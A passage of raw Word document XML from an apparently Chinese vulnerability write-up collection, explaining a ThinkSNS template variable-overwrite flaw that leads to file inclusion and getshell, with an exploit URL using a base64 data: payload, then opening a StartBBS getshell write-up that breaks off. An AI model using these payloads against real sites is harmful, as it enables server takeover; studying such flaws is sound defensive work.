            <v:rect id="_x0000_s3860" style="position:absolute;left:2197;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3859" style="position:absolute;left:2297;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3858" style="position:absolute;left:2397;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3857" style="position:absolute;left:2497;top:1593;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3856" style="position:absolute;left:2597;top:1593;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3855" style="position:absolute;left:3922;top:1593;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3854" style="position:absolute;left:4043;top:1593;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3853" style="position:absolute;left:4163;top:1593;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3852" style="position:absolute;left:4284;top:1593;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3851" style="position:absolute;left:1617;top:1856;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3850" style="position:absolute;left:1797;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3849" style="position:absolute;left:1897;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3848" style="position:absolute;left:1997;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3847" style="position:absolute;left:2097;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3846" style="position:absolute;left:2197;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3845" style="position:absolute;left:2297;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3844" style="position:absolute;left:2397;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3843" style="position:absolute;left:2497;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3842" style="position:absolute;left:2597;top:1919;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3841" style="position:absolute;left:4766;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3840" style="position:absolute;left:4866;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3839" style="position:absolute;left:4966;top:1919;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3838" style="position:absolute;left:5086;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3837" style="position:absolute;left:5186;top:1919;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3836" style="position:absolute;left:1617;top:2182;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3835" style="position:absolute;left:1797;top:2245;width:4217;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3834" style="position:absolute;left:1617;top:2508;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3833" style="position:absolute;left:1797;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3832" style="position:absolute;left:1897;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3831" style="position:absolute;left:1997;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3830" style="position:absolute;left:2097;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3829" style="position:absolute;left:2197;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3828" style="position:absolute;left:2297;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3827" style="position:absolute;left:2397;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3826" style="position:absolute;left:2497;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3825" style="position:absolute;left:2597;top:2541;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3824" style="position:absolute;left:2838;top:2541;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3823" style="position:absolute;left:2938;top:2541;width:2800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3822" style="position:absolute;left:1617;top:2834;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3821" style="position:absolute;left:1797;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3820" style="position:absolute;left:1897;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3819" style="position:absolute;left:1997;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3818" style="position:absolute;left:2097;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3817" style="position:absolute;left:2197;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3816" style="position:absolute;left:2297;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3815" style="position:absolute;left:2397;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3814" style="position:absolute;left:2497;top:2897;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3813" style="position:absolute;left:2597;top:2897;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3812" style="position:absolute;left:5127;top:2897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3811" style="position:absolute;left:5248;top:2897;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3810" style="position:absolute;left:1617;top:3160;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3809" style="position:absolute;left:1797;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3808" style="position:absolute;left:1897;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3807" style="position:absolute;left:1997;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3806" style="position:absolute;left:2097;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3805" style="position:absolute;left:2197;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3804" style="position:absolute;left:2297;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3803" style="position:absolute;left:2397;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3802" style="position:absolute;left:2497;top:3193;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3801" style="position:absolute;left:2597;top:3193;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3800" style="position:absolute;left:2838;top:3193;width:1600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3799" style="position:absolute;left:1617;top:3486;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3798" style="position:absolute;left:1797;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3797" style="position:absolute;left:1897;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3796" style="position:absolute;left:1997;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3795" style="position:absolute;left:2097;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3794" style="position:absolute;left:2197;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3793" style="position:absolute;left:2297;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3792" style="position:absolute;left:2397;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3791" style="position:absolute;left:2497;top:3549;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3790" style="position:absolute;left:2597;top:3549;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3789" style="position:absolute;left:3440;top:3549;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3788" style="position:absolute;left:3561;top:3549;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s3787" style="position:absolute;left:1617;top:3812;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s3786" type="#_x0000_t75" style="position:absolute;left:1797;top:3875;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s3785" type="#_x0000_t202" style="position:absolute;left:1614;top:370;width:6750;height:3951" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="10"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="13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加载模板</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="1368" w:firstLine="398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load($templateFile,$templateVar,$charset) {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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$this-&gt;tVar = $templateVar;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3348"/>
                      </w:tabs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$templateCacheFile</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=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loadTemplate(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$templateFile);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62"/>
                      <w:ind w:left="9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模板阵列变量分解成为独立变量</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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extract(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$templateVar, EXTR_OVERWRITE);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="980" w:right="5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载入模版缓存文件</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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include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$templateCacheFile;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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">\core\OpenSociax\Template.class.php load </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="39" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="417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与缓存情况下相同，也是调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-89"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">extract </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来覆盖变量，由于第二个参数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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的使用，因此如果模板变量可控的话，我们可以覆盖任意变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="149" w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>可以覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$templateCacheFile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>变量，这样变量覆盖就变成了任意文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>件包含，并可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-63"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>getshell.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>之：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7888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120718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4295120" cy="1900237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="11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20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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="94"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在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allow_url_include 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  <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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6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3783" type="#_x0000_t202" style="width:337.5pt;height:67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bookmarkStart w:id="86" w:name="开源轻论坛StartBBS前台getshell"/>
                  <w:bookmarkStart w:id="87" w:name="_bookmark39"/>
                  <w:bookmarkEnd w:id="86"/>
                  <w:bookmarkEnd w:id="87"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>http://**.**.**.**/thinksns/index.php?app=public&amp;mod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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>=Comment&amp;act=reply&amp;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>templateCacheFile=data</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:text</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/plain; base64,PD9waHAgcGhwaW5mbygpOz8%2b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5"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>轻论坛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-88"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">StartBBS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-88"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phith0n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="94" w:line="309" w:lineRule="auto"/>
        <w:ind w:right="415"/>
        <w:jc w:val="both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w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>心血来潮读读代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">StartBBS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>界面挺清爽的，体积也小。下载下来安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="151" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安装好后发现根目录下多了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>install.lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，一般的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">cms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了防止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被重安装就会在目录下生成一个类似的文件，下次有人再访问安装脚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
